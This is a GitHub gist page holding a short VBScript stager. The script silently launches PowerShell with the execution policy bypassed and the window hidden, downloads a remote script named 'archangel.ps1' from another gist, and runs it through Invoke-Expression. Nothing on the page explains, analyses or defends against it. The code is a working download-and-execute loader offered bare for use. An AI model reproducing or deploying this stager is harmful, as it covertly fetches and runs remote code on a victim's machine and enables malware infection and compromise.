Skip to content

Instantly share code, notes, and snippets.

@kas-sec
Created June 24, 2025 19:01
Show Gist options
  • Save kas-sec/7935b972da5706119ab6823f249a461c to your computer and use it in GitHub Desktop.
Save kas-sec/7935b972da5706119ab6823f249a461c to your computer and use it in GitHub Desktop.
Dim shell, command
Set shell = CreateObject("WScript.Shell")
command = "powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command ""& {Invoke-WebRequest -Uri 'https://gist.githubusercontent.com/kas-sec/ff5b94b64c2613b358855846480dad99/raw/63d8f7eaed8c4a5b74cf85621810ae810b75c75e/archangel.ps1' -UseBasicParsing | Invoke-Expression}"""
shell.Run command, 0, False
Set shell = Nothing
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment